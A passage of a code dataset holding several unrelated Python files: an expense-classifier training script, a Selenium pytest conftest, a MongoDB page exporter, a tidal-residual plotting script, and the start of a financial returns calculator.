'')\n if date_str.endswith('-'):\n date_str = date_str[:-1]\n if time_str.endswith(':'):\n time_str = time_str[:-1]\n if not re.findall(SECOND_PATTERN, time_str):\n temp = re.findall(MINUTE_PATTERN, time_str)\n minute_str = temp[0] if temp else '00:00'\n time_str = '{}:{}'.format(minute_str, '00')\n\n return '{} {}'.format(date_str, time_str).strip() if date_str else ''\n\n\nif __name__ == '__main__':\n random_sleep_time(5, 2)\n\n", "sub_path": "common_tools/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 9194, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.setdefaultencoding", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 26, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 27, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 28, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 29, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 48, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 57, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 67, "usage_type": "call"}, {"api_name": "six.text_type", "line_number": 76, "usage_type": "attribute"}, {"api_name": "six.text_type", "line_number": 78, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 97, "usage_type": "call"}, {"api_name": "common_tools.config.PROXY_GET_URL", "line_number": 97, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 97, "usage_type": "name"}, {"api_name": "common_tools.exception.GetProxyError", "line_number": 101, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 101, "usage_type": "name"}, {"api_name": "common_tools.exception.GetProxyError", "line_number": 103, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 103, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 118, "usage_type": "call"}, {"api_name": "common_tools.config.PROXY_PUT_URL", "line_number": 118, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 118, "usage_type": "name"}, {"api_name": "common_tools.exception.PutProxyError", "line_number": 120, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 120, "usage_type": "name"}, {"api_name": "common_tools.exception.PutProxyError", "line_number": 122, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 122, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 132, "usage_type": "call"}, {"api_name": "common_tools.config.ZHIMA_PROXY_URL", "line_number": 132, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 132, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 133, "usage_type": "call"}, {"api_name": "common_tools.config.DEFAULT_HEADERS", "line_number": 133, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 133, "usage_type": "name"}, {"api_name": "common_tools.exception.GetProxyError", "line_number": 143, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 143, "usage_type": "name"}, {"api_name": "common_tools.exception.GetProxyError", "line_number": 145, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 145, "usage_type": "name"}, {"api_name": "common_tools.config.WHITE_URL", "line_number": 151, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 151, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 152, "usage_type": "call"}, {"api_name": "common_tools.config.DEFAULT_HEADERS", "line_number": 152, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 152, "usage_type": "name"}, {"api_name": "common_tools.exception.GetProxyError", "line_number": 154, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 154, "usage_type": "name"}, {"api_name": "common_tools.config.ABUYUN_PROXY.get", "line_number": 163, "usage_type": "call"}, {"api_name": "common_tools.config.ABUYUN_PROXY", "line_number": 163, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 163, "usage_type": "name"}, {"api_name": "common_tools.config.ABUYUN_PROXY.get", "line_number": 164, "usage_type": "call"}, {"api_name": "common_tools.config.ABUYUN_PROXY", "line_number": 164, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 164, "usage_type": "name"}, {"api_name": "common_tools.config.ABUYUN_PROXY.get", "line_number": 165, "usage_type": "call"}, {"api_name": "common_tools.config.ABUYUN_PROXY", "line_number": 165, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 165, "usage_type": "name"}, {"api_name": "common_tools.config.ABUYUN_PROXY.get", "line_number": 166, "usage_type": "call"}, {"api_name": "common_tools.config.ABUYUN_PROXY", "line_number": 166, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 166, "usage_type": "name"}, {"api_name": "common_tools.config.DOBEL_PROXY.get", "line_number": 181, "usage_type": "call"}, {"api_name": "common_tools.config.DOBEL_PROXY", "line_number": 181, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 181, "usage_type": "name"}, {"api_name": "common_tools.config.DOBEL_PROXY.get", "line_number": 182, "usage_type": "call"}, {"api_name": "common_tools.config.DOBEL_PROXY", "line_number": 182, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 182, "usage_type": "name"}, {"api_name": "common_tools.config.DOBEL_PROXY.get", "line_number": 183, "usage_type": "call"}, {"api_name": "common_tools.config.DOBEL_PROXY", "line_number": 183, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 183, "usage_type": "name"}, {"api_name": "common_tools.config.DOBEL_PROXY.get", "line_number": 184, "usage_type": "call"}, {"api_name": "common_tools.config.DOBEL_PROXY", "line_number": 184, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 184, "usage_type": "name"}, {"api_name": "common_tools.exception.GetProxyError", "line_number": 200, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 200, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 202, "usage_type": "call"}, {"api_name": "common_tools.config.ABUYUN_PROXY.get", "line_number": 203, "usage_type": "call"}, {"api_name": "common_tools.config.ABUYUN_PROXY", "line_number": 203, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 203, "usage_type": "name"}, {"api_name": "common_tools.config.ABUYUN_SWITCH_IP", "line_number": 204, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 204, "usage_type": "name"}, {"api_name": "common_tools.config.DOBEL_PROXY.get", "line_number": 205, "usage_type": "call"}, {"api_name": "common_tools.config.DOBEL_PROXY", "line_number": 205, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 205, "usage_type": "name"}, {"api_name": "common_tools.config.DOBEL_SWITCH_IP", "line_number": 206, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 206, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 210, "usage_type": "call"}, {"api_name": "common_tools.config.DEFAULT_HEADERS", "line_number": 210, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 210, "usage_type": "name"}, {"api_name": "requests.RequestException", "line_number": 211, "usage_type": "attribute"}, {"api_name": "common_tools.exception.GetProxyError", "line_number": 212, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 212, "usage_type": "name"}, {"api_name": "requests.Response", "line_number": 221, "usage_type": "attribute"}, {"api_name": "common_tools.config.CHARTSET_RE.findall", "line_number": 224, "usage_type": "call"}, {"api_name": "common_tools.config.CHARTSET_RE", "line_number": 224, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 224, "usage_type": "name"}, {"api_name": "common_tools.config.CHARTSET_RE.findall", "line_number": 225, "usage_type": "call"}, {"api_name": "common_tools.config.CHARTSET_RE", "line_number": 225, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 225, "usage_type": "name"}, {"api_name": "common_tools.config.PRAGMA_RE.findall", "line_number": 226, "usage_type": "call"}, {"api_name": "common_tools.config.PRAGMA_RE", "line_number": 226, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 226, "usage_type": "name"}, {"api_name": "common_tools.config.PRAGMA_RE.findall", "line_number": 227, "usage_type": "call"}, {"api_name": "common_tools.config.PRAGMA_RE", "line_number": 227, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 227, "usage_type": "name"}, {"api_name": "chardet.detect", "line_number": 229, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 241, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 246, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 247, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 248, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 249, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 255, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 258, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 263, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 264, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 265, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 266, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 267, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 280, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 281, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 292, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 293, "usage_type": "call"}]}
+{"seq_id": "573054179", "text": "from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import make_pipeline\nfrom scipy.sparse import csr_matrix\nimport psycopg2\nimport numpy\nimport random\nimport pickle\nimport sys\nimport db_manager\nimport prediction_utility\n\nCLASS_SIZE = 10\n\nENV = sys.argv[1]\nUSER_ID = sys.argv[2]\nprint('#node:Python Started', ENV, USER_ID)\n\n\n# region Database methods\ndef getExpenses():\n connection = db_manager.connect(ENV)\n with connection.cursor() as curs:\n curs.execute(\n 'SELECT amount, date, stores.store_name, COALESCE(category_id, -1) ' +\n 'FROM expenses LEFT JOIN stores on stores.id = store_id' +\n ' WHERE user_id = %s ORDER BY category_id;', [USER_ID])\n expenses = curs.fetchall()\n return expenses\n\n\ndef save_model(model, exp_count):\n connection = db_manager.connect(ENV)\n with connection.cursor() as curs:\n curs.execute(\n 'INSERT INTO category_classifier (user_id, model, expense_count, \"createdAt\", \"updatedAt\") ' +\n 'VALUES (%s, %s, %s, now(), now()) ON CONFLICT (user_id) DO UPDATE SET model = EXCLUDED.model, \"updatedAt\" = now(), expense_count = EXCLUDED.expense_count;',\n (str(USER_ID), psycopg2.Binary(model), str(exp_count)))\n connection.commit()\n# endregion\n\n\ndef formatExpenses(expenses, store_vectorizer):\n result = []\n categories = []\n for expense in expenses:\n result.append(prediction_utility.format_expense(\n expense, store_vectorizer))\n categories.append(-1 if expense[3] == None else expense[3])\n return (result, categories)\n\n\n# region :Text vectorization\ndef getLetterCombinations():\n # generate all possible permutations of letters\n letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',\n 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n return [letter+letter2 for letter2 in letters for letter in letters]\n\n\ndef build_vectorizer(texts):\n vectorizer = CountVectorizer(analyzer='char', ngram_range=(2, 2))\n # returns document-term matrix\n X = vectorizer.fit_transform(texts)\n print(len(X.toarray()))\n return vectorizer\n# endregion\n\n\ndef sample(expenses):\n groups = {}\n # group expenses by category\n for exp in expenses:\n try:\n groups[exp[3]].append(exp)\n except:\n groups[exp[3]] = [exp]\n # over and undersample as required\n final = []\n for g in groups:\n if(len(groups[g]) < CLASS_SIZE):\n while(len(groups[g]) < CLASS_SIZE):\n groups[g] = groups[g] + groups[g].copy()\n # if(len(groups[g]) > CLASS_SIZE):\n # groups[g] = groups[g][0:10]\n final = final + groups[g]\n return final\n\n\n# region: Helpers\ndef printAll(arr):\n for a in arr:\n print(a)\n\n\ndef r():\n return 0.5\n\n\ndef add(prop, obj):\n try:\n obj[prop] += 1\n except:\n obj[prop] = 1\n\n\ndef printResults(result):\n tCount = {}\n catCount = {}\n\n i = 0\n correct = 0\n for r in result:\n print(r, categories[i])\n if(r == categories[i]):\n correct += 1\n add(r, tCount)\n add(categories[i], catCount)\n i += 1\n\n print('Overall: ', correct / len(categories))\n\n # print('Test Counts')\n # printCount(tCount)\n print('Actual Counts')\n printCount(catCount, tCount)\n\n\ndef printCount(count, tCount):\n # Print distribution of prediciton vs actual distribution\n for c in count:\n print(c, ': ', count[c], tCount[c] if c in tCount else 0)\n# endregion\n\n\ndef getSGDCLassifier(l):\n SGDClassifier(n_iter_no_change=1000000/l)\n\n\ndef main():\n print('Started')\n store_vectorizer = build_vectorizer(getLetterCombinations())\n # print(store_vectorizer.transform(['abaa']).toarray())\n expenses = getExpenses()\n random.shuffle(expenses, r)\n (formatted, categories) = formatExpenses(expenses, store_vectorizer)\n clf = make_pipeline(\n # StandardScaler(),\n # getSGDCLassifier(len(expenses))\n RandomForestClassifier()\n )\n clf.fit(formatted, categories)\n\n print('clf Score: ', clf.score(formatted, categories))\n\n save_model(pickle.dumps(clf), len(expenses))\n\n\nmain()\n", "sub_path": "server/prediction/create_prediction_model.py", "file_name": "create_prediction_model.py", "file_ext": "py", "file_size_in_byte": 4371, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "db_manager.connect", "line_number": 24, "usage_type": "call"}, {"api_name": "db_manager.connect", "line_number": 35, "usage_type": "call"}, {"api_name": "psycopg2.Binary", "line_number": 40, "usage_type": "call"}, {"api_name": "prediction_utility.format_expense", "line_number": 49, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 64, "usage_type": "call"}, {"api_name": "sklearn.linear_model.SGDClassifier", "line_number": 139, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 147, "usage_type": "call"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 149, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 152, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 158, "usage_type": "call"}]}
+{"seq_id": "196598859", "text": "import pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport time\n\n# обработка командной строки - '--browser_name' - название параметра который можно вводить в командную строку\n# default=None - можно поставить значение по умолчанию\ndef pytest_addoption(parser):\n parser.addoption('--browser', action='store', default=None,\n help=\"Choose browser: chrome or firefox\")\n\n parser.addoption('--language', action='store', default='en-gb',\n help=\"Choose browser: chrome or firefox\")\n\n@pytest.fixture(scope=\"function\")\ndef browser(request):\n # проверка что текущий браузер chrome or firefox\n browser = request.config.getoption(\"browser\")\n browser = None\n if browser == \"chrome\" or \"Chrome\":\n print(\"\\nstart chrome browser for test..\")\n browser = webdriver.Chrome()\n elif browser == \"firefox\" or \"Firefox\":\n print(\"\\nstart firefox browser for test..\")\n browser = webdriver.Firefox()\n else:\n raise pytest.UsageError(\"--browser should be chrome or firefox\")\n yield browser\n print(\"\\nquit browser..\")\n browser.quit()\n\n@pytest.fixture(scope=\"function\")\ndef browser(request):\n user_language = request.config.getoption(\"--language\")\n print(f\"\\nstart browser for test in {user_language}\")\n options = Options()\n options.add_experimental_option('prefs', {'intl.accept_languages': user_language})\n browser = webdriver.Chrome(options=options)\n link = f\"http://selenium1py.pythonanywhere.com/{user_language}/accounts/login/\"\n browser.get(link)\n browser.maximize_window()\n time.sleep(1)\n yield browser\n print(\"\\nquit browser..\")\n browser.quit()\n", "sub_path": "conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 1845, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 22, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 22, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 25, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 25, "usage_type": "name"}, {"api_name": "pytest.UsageError", "line_number": 27, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 36, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 38, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 38, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "258931371", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pymongo\nfrom os import path, makedirs\nfrom bson import json_util\nimport sys\nfrom glob import glob\nimport json\nimport re\n\nBASE_DIR = path.dirname(path.dirname(__file__))\nsys.path.append(BASE_DIR)\n\nfrom controller.base import prop\nfrom controller.page.base import PageHandler as Ph\n\n\ndef export_page(db_name='tripitaka', uri='localhost', out_dir=None, source='', phonetic=False, text_finished=False):\n conn = pymongo.MongoClient(uri)\n db = conn[db_name]\n cond = {'source': {'$regex': str(source)}} if source else {}\n if phonetic:\n cond['$or'] = [{f: {'$regex': '音釋|音释'}} for f in ['ocr', 'ocr_col', 'text']]\n out_dir = out_dir and str(out_dir) or source or 'pages'\n for index in range(1000):\n rows = list(db.page.find(cond).skip(index * 100).limit(100))\n if rows:\n if not path.exists(out_dir):\n makedirs(out_dir)\n print('export %d pages...' % len(rows))\n for p in rows:\n tasks = db.task.find({'doc_id': p['name'], 'task_type': {'$regex': '^text'}, 'status': 'finished'})\n if text_finished and not tasks:\n continue\n for task in tasks:\n p[task['task_type']] = Ph.html2txt(prop(task, 'result.txt_html', ''))\n\n p['_id'] = str(p['_id'])\n p['create_time'] = p['create_time'].strftime('%Y-%m-%d %H:%M:%S')\n with open(path.join(out_dir, '%s.json' % str(p['name'])), 'w') as f:\n for k, v in list(p.items()):\n if not v or k in ['lock', 'level', 'tasks']:\n p.pop(k)\n f.write(json_util.dumps(p, ensure_ascii=False))\n\n\n# python3 ~/export_page.py --out_dir=1200 --source=1200 --phonetic=1 --text_finished=1 --db_name=... --uri=mongodb://...\ndef export_phonetic(json_dir):\n with open('phonetic.txt', 'w') as f:\n for json_file in sorted(glob(path.join(json_dir, '*.json'))):\n page = json.load(open(json_file))\n texts, tags = set(), []\n for i, field in enumerate(['text_proof_1', 'text_proof_2', 'text', 'ocr', 'ocr_col']):\n text = re.search(r'(音释|音釋)\\|+(.+)$', page.get(field, ''))\n if text:\n if texts and i > 1:\n continue\n text = text.group(2)\n txt2 = re.sub('[YM]', '', text)\n if txt2 not in texts:\n texts.add(txt2)\n tags.append((field, text))\n names = dict(text_proof_1='一校', text_proof_2='二校', text='旧审', ocr='字框', ocr_col='行文')\n for field, text in tags:\n f.write('%s(%s)\\t%s\\n' % (page['name'], names[field], text))\n\n\nif __name__ == '__main__':\n import fire\n\n fire.Fire(export_page)\n print('finished!')\n", "sub_path": "utils/export_page.py", "file_name": "export_page.py", "file_ext": "py", "file_size_in_byte": 2947, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "name"}, {"api_name": "sys.path.append", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 30, "usage_type": "call"}, {"api_name": "controller.page.base.PageHandler.html2txt", "line_number": 37, "usage_type": "call"}, {"api_name": "controller.page.base.PageHandler", "line_number": 37, "usage_type": "name"}, {"api_name": "controller.base.prop", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "name"}, {"api_name": "bson.json_util.dumps", "line_number": 45, "usage_type": "call"}, {"api_name": "bson.json_util", "line_number": 45, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "name"}, {"api_name": "json.load", "line_number": 52, "usage_type": "call"}, {"api_name": "re.search", "line_number": 55, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 60, "usage_type": "call"}, {"api_name": "fire.Fire", "line_number": 72, "usage_type": "call"}]}
+{"seq_id": "306377851", "text": "from __future__ import division,print_function\nimport matplotlib as mpl\nimport scipy as sp\nfrom datatools import *\nfrom gridtools import *\nfrom plottools import *\nfrom projtools import *\nimport matplotlib.tri as mplt\nimport matplotlib.pyplot as plt\n#from mpl_toolkits.basemap import Basemap\nimport os as os\nimport sys\nnp.set_printoptions(precision=8,suppress=True,threshold=sys.maxsize)\nsys.path.append('/home/moe46/Desktop/school/workspace_python/ttide_py/ttide/')\nsys.path.append('/home/moflaher/Desktop/workspace_python/ttide_py/ttide/')\nfrom t_tide import t_tide\nfrom t_predic import t_predic\nfrom matplotlib.collections import LineCollection as LC\nfrom matplotlib.collections import PolyCollection as PC\nimport multiprocessing\n\n# Define names and types of data\nname='2012-02-01_2012-03-01_0.01_0.001'\ngrid='vh_high'\n\nregionname='secondnarrows'\nstarttime=0\nendtime=1000\ncmin=0\ncmax=0.5\n\n\n### load the .nc file #####\ndata = loadnc('runs/'+grid+'/'+name+'/output/',singlename=grid + '_0001.nc')\nprint('done load')\ndata = ncdatasort(data)\nprint('done sort')\n\nvectorflag=False\ncoastflag=True\nuniformvectorflag=True\n#vector_spacing=125\n#vector_scale=750\nvector_spacing=75\nvector_scale=1250\nzetanode=2500\n\ncages=loadcage('runs/'+grid+'/' +name+ '/input/' +grid+ '_cage.dat')\nif np.shape(cages)!=():\n tmparray=[list(zip(data['nodell'][data['nv'][i,[0,1,2,0]],0],data['nodell'][data['nv'][i,[0,1,2,0]],1])) for i in cages ]\n color='g'\n lw=.2\n ls='solid'\n\n\nregion=regions(regionname)\nnidx=get_nodes(data,region)\neidx=get_elements(data,region)\nvidx=equal_vectors(data,region,vector_spacing)\n\nsavepath='figures/timeseries/' + grid + '_' + '/residual_with_zeta/' + name + '_' + regionname + '_' +(\"%f\" %cmin) + '_' + (\"%f\" %cmax) + '/'\nif not os.path.exists(savepath): os.makedirs(savepath)\n\n\nuv=np.load('data/ttide/'+grid+'_'+name+'_'+'_uv_all.npy')\nuv=uv[()]\n\nresu=np.zeros((data['nele'],len(data['time'][starttime:(endtime+1)])))\nresv=np.zeros((data['nele'],len(data['time'][starttime:(endtime+1)])))\nfor j in range(0,len(eidx)):\n print( (\"%d\"%j)+\" \"+(\"%f\"%(j/len(eidx)*100)))\n i=eidx[j] \n tp=t_predic(data['time'][starttime:(endtime+1)],uv['nameu'],uv['freq'],uv['tidecon'][i,:,:])\n resu[i,:]=data['ua'][starttime:(endtime+1),i]-np.real(tp).flatten()\n resv[i,:]=data['va'][starttime:(endtime+1),i]-np.imag(tp).flatten()\n\n\nymax=np.max(data['zeta'][starttime:endtime,nidx[zetanode]])\nymin=np.min(data['zeta'][starttime:endtime,nidx[zetanode]])\n\n\ndef res_plot(i):\n print(i)\n f=plt.figure()\n ax=plt.axes([.125,.1,.775,.8])\n triax=ax.tripcolor(data['trigrid'],np.sqrt(resu[:,i]**2+resv[:,i]**2),vmin=cmin,vmax=cmax)\n if coastflag==True:\n plotcoast(ax,filename='pacific_harbour.nc',color='None', fcolor='darkgreen', fill=True)\n if np.shape(cages)!=(): \n lseg_t=LC(tmparray,linewidths = lw,linestyles=ls,color=color)\n ax.add_collection(lseg_t) \n if vectorflag==True:\n Q1=ax.quiver(data['uvnodell'][vidx,0],data['uvnodell'][vidx,1],resu[vidx,i],resv[vidx,i],angles='xy',scale_units='xy',scale=vector_scale,zorder=100,width=.0025) \n if uniformvectorflag==True:\n norm=np.sqrt(resu[vidx,i]**2+resv[vidx,i]**2)\n Q1=ax.quiver(data['uvnodell'][vidx,0],data['uvnodell'][vidx,1],np.divide(resu[vidx,i],norm),np.divide(resv[vidx,i],norm),angles='xy',scale_units='xy',scale=vector_scale,zorder=100,width=.002,color='k') \n prettyplot_ll(ax,setregion=region,cblabel=r'Residual (ms$^{-1}$)',cb=triax)\n \n #ax1=plt.axes([.125,.675,.675,.2])\n ax1=plt.axes([.125,.545,.675,.2])\n ax1.plot(data['time'][starttime:i]-data['time'][starttime],data['zeta'][starttime:i,nidx[zetanode]])\n ax1.set_ylabel(r'Elevation (m)')\n ax1.set_xlabel(r'Time (days)')\n ax1.xaxis.set_tick_params(labeltop='on',labelbottom='off')\n ax1.axis([data['time'][starttime]-data['time'][starttime],data['time'][endtime]-data['time'][starttime],ymin,ymax])\n _formatter = mpl.ticker.ScalarFormatter(useOffset=False)\n ax1.yaxis.set_major_formatter(_formatter)\n ax1.xaxis.set_major_formatter(_formatter)\n ax1.xaxis.set_label_coords(0.5, 1.4) \n \n \n \n f.savefig(savepath + grid + '_' + region['regionname'] +'_residual_' + (\"%04d\" %(i)) + '.png',dpi=150)\n plt.close(f)\n\n\n\npool = multiprocessing.Pool(2)\npool.map(res_plot,range(starttime,endtime))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "plot_residual_with_zeta.py", "file_name": "plot_residual_with_zeta.py", "file_ext": "py", "file_size_in_byte": 4374, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.maxsize", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 62, "usage_type": "call"}, {"api_name": "t_predic.t_predic", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.collections.LineCollection", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.ticker.ScalarFormatter", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 106, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.close", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "multiprocessing.Pool", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "3917194", "text": "from app import app, db\nfrom app.models import FinancialObject, FinancialObjectSchema, TSData, TSDataSchema\nfrom bokeh.io import output_file\nfrom bokeh.models import ColumnDataSource, LinearAxis, Range1d\nfrom bokeh.plotting import figure, show\nfrom config import basedir\nfrom calendar import leapdays, monthrange\nfrom datetime import datetime, timedelta\nimport flask\nimport json\nimport marshmallow as ma\nimport numpy as np\nimport pandas as pd\n\n\nts_hierarchy_file = open(basedir + '/ts_hierarchy.json')\nts_hierarchy = json.loads(ts_hierarchy_file.read())\n\n\nclass TSCalc(object):\n def __init__(self, foid, freq_code, start=None, end=None, benchmark=None, div_id_target=None):\n self.foid = foid\n self.freq_code = freq_code\n self.start: datetime = start\n self.end: datetime = end\n\n # self.level: pd.DataFrame = self.compute_ts_level(self.foid, self.freq_code)\n self.ts: pd.DataFrame = self.compute_ts_returns(self.foid, self.freq_code)\n self.cumulative: pd.DataFrame = self.compute_cumulative_return(self.ts)\n\n if not self.start:\n self.start = self.ts.index.min().to_pydatetime()\n if not self.end:\n self.end = self.ts.index.max().to_pydatetime()\n self.ts = self.ts[start:end]\n self.periodicity = None\n if freq_code == \"A\":\n self.periodicity = 1\n elif freq_code == \"Q\":\n self.periodicity = 4\n elif freq_code == \"M\":\n self.periodicity = 12\n self.calculate()\n\n def calculate(self):\n self.mtd_return = self.ts[self.ts.index.max()]\n self.qtd_return = np.product(self.ts[(self.find_previous_quarter_end(self.end) + timedelta(days=1)): self.end].apply(lambda x: x+1)) - 1\n self.ytd_return = np.product(self.ts[(self.find_previous_year_end(self.end) + timedelta(days=1)): self.end].apply(lambda x: x+1)) - 1\n # must compensate for leap years, handled below by constructing a datetime\n self.one_year_return = self.calculate_annualized_return(years=1)\n self.two_year_return = self.calculate_annualized_return(years=2)\n self.three_year_return = self.calculate_annualized_return(years=3)\n self.four_year_return = self.calculate_annualized_return(years=4)\n self.five_year_return = self.calculate_annualized_return(years=5)\n self.itd_annualized_return = self.cumulative[self.end.date().isoformat()] / self.cumulative[self.end.date().isoformat()] ** 365 / (self.end - self.start).days # Here begins time window returns (default 